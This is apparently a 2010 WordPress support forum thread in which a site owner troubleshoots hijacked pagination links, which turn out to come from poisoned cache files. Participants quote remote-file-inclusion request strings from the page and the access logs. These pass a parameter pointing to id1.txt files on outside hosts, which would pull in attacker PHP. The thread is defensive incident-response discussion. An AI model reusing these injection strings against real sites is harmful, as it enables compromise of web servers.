wp 2.9.1 sophisticated hack

  • navigadget
    Member

    @navigadget

    I’m using the latest version of WP and my site is hacked. I cannot figure out how they got in. Details:

    • older, newer page links at the bottom of the page are hijacked (see image url)
    • doesn’t show hijacked links once I login as admin
    • after I log in as admin and then log out, the hijacked link never shows up
    • looked at timestamps via ftp as much as I could; nothing
    • installed exploit scanner; nothing
    • grepped for base64 and eval text in my database file and all other files; nothing
    • see it here: http://imgur.com/2zqDb.jpg

    Please help. I do not know for how long this has been going on…

  • Clayton James
    Participant

    @claytonjames

    This is what I get on rollover on the very same link on your site.

    //www.yoursite.com/?_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS&mosConfig_absolute_path=http%3A%2F%2Fqqe.ru%2Fforum%2FSmileys%2Fid1.txt%3F%3F

    //qqe.ru/forum/Smileys/id1.txt

    Search this string in Google for info: echo("Shiro"."Hige") -or- this “id1.txt”

    This may also be relevant information.

    Anything telling in your access logs?

    navigadget
    Member

    @navigadget

    What should I look for in access logs? I’m not very good at this. I see he is using some “go1” to pass the URL in my access logs:

    [23/Jan/2010:01:30:38 -0600] “GET /?go1=http://pivot-e-solutions.com/includes/domit/id1.txt?? HTTP/1.1” 403 54923 “-” “Mozilla/5.0”

    And there’s some php code there. I searched all my files for “go1” but nothing came up. I searched for go1 using exploit scanner; one hit was something like this:

    Blocker Filesystem pattern scan Found string go1 [ABSPATH]/wp-content/cache/wp-cache-7ef8f7e1c52df0895d36dd2b3ef0ed41.html:267
    Context

    href=”http://www.mysite.com/index.php/page/2?go1=http%3A%2F%2Fpivot-e-solutions.com%2Fincludes%2Fdomit%2Fid1.txt” ><span class=’older’>Older Entries</span> </div>

    Clayton James
    Participant

    @claytonjames

    It may be worth seeking advice or information from your host first. Perhaps they have dealt with the issue before and can offer some guidance.
    I’m guessing you might be on a shared server, so they may have, or want information relative to your issue. Other than that, there are tons of links and “how to” on cleaning up a hacked site.

    FAQ My site was hacked

    themaclady
    Member

    @themaclady

    I’m still having a problem with hidden users. After upgrading to 2.9.1 I’m not sure I’ve cleaned out the user in the DB.

    I upgraded and the user showed up in the Users panel… deleted.

    Deleted DB and made new one and re-uploaded the saved DB file.

    Site is working again but not sure I got rid of the ID, although something in My PHP Admin told me to delete user_id2 which I did….

    Not sure what I clicked on to bring that up but posts now do not have spam words in the Google alert. Can’t see the purpose of this hack — the link still goes to the blog, the words don’t show up anyplace…???

    navigadget
    Member

    @navigadget

    I’ve realized the hijacked links were the cached ones and that’s probably why they wouldn’t show up once I logged in.

    I do not have any reason to believe wp-super-cache plugin was the problem but once I got rid of that plugin completely my links look normal (maybe clayton can check again 🙂)

    I hate how I still do not know what files/database entries are/were causing this.

    texxs
    Participant

    @texxs

    ahh http://redtideflorida.org/pages in case you were wondering . . .

    texxs
    Participant

    @texxs

    Crap, sorry, wrong discussion. I was at a very similar discussion at:
    http://wordpress.org/support/topic/357635?replies=9#post-1431225
